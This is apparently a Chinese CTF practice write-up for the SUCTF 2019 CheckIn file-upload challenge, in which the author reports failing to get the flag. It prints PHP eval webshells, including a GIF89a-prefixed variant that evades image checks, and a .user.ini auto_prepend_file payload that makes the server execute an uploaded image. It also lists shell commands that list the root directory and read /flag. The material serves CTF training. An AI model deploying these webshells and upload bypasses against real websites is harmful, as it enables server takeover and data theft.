练习 9 Web [SUCTF 2019]CheckIn (未拿到flag)

上传图片格式的木马文件:

返回 <? in contents!,存在PHP代码检测

上传非图片格式文件:

返回 不允许非image

修改木马PHP代码规避检测

php 复制代码
<? ?> 改为 < script language="php">< /script >

<?php @eval($_POST['shell']);?> 

<script language='php'>@eval($_POST['shell']);</script>

上传强行加上gif文件头的GIF图片木马

php 复制代码
GIF89a?<script language='php'>@eval($_POST['shell']);</script>

返回如下内容:上传文件位置

现在传上去,因为还是图片格式文件,没有办法执行

尝试在"练习5"中提到的.htaccess文件,发现也被过滤了

卡住,搜索其他wp

新内容:user.ini文件
SUCTF 2019CheckIn 1
user.ini文件构成的PHP后门
BUUCTF | SUCTF 2019CheckIn

因为本题过滤非图片格式,所以必须加上前面的"GIF89a"

php 复制代码
GIF89a                  //绕过exif_imagetype()
auto_prepend_file=a.jpg //指定在主文件之前自动解析的文件的名称,并包含该文件,就像使用require函数调用它一样。
auto_append_file=a.jpg  //解析后进行包含

uploads/18de044ce1c88142786756f6f8015474/index.php

cmd=var_dump(scandir("/"));

cmd=var_dump(file_get_contents("/flag"));

但最后始终刷不出来,不知道什么情况,蚁剑也死活连不上

相关推荐
神明不懂浪漫34 分钟前
【第四章】CSS(二)——文本外观属性与复合选择器
前端·css·经验分享·笔记
kyriewen44 分钟前
别再用AI debug了——这5种bug越修越烂
前端·javascript·ai编程
星释2 小时前
鸿蒙智能体开发实战:39.鸿蒙壁纸大师 - 前端卡片显示与交互优化
前端·华为·交互·harmonyos·鸿蒙·火山引擎
顾昂_2 小时前
内存泄漏排查和 Chrome DevTools 使用教程
前端·javascript·面试
IT_陈寒3 小时前
Java线程池这个坑我算是踩明白了
前端·人工智能·后端
31535669134 小时前
Superpowers:GPT-5.6 时代下的流程毒瘤
前端·后端
清秋4 小时前
全网最全 ECMAScript 攻略( 更新至 ES2026)
前端·javascript·编程语言
Cao_Ron5 小时前
用 SVG image symbol 画 ECharts graph 圆形节点
前端
hxy06015 小时前
React-Call让你的React组件像异步函数一样调用
前端·react.js
Hilaku5 小时前
为什么 AI 写前端时,总是优先选择 React,而不是 Vue?
前端·javascript·程序员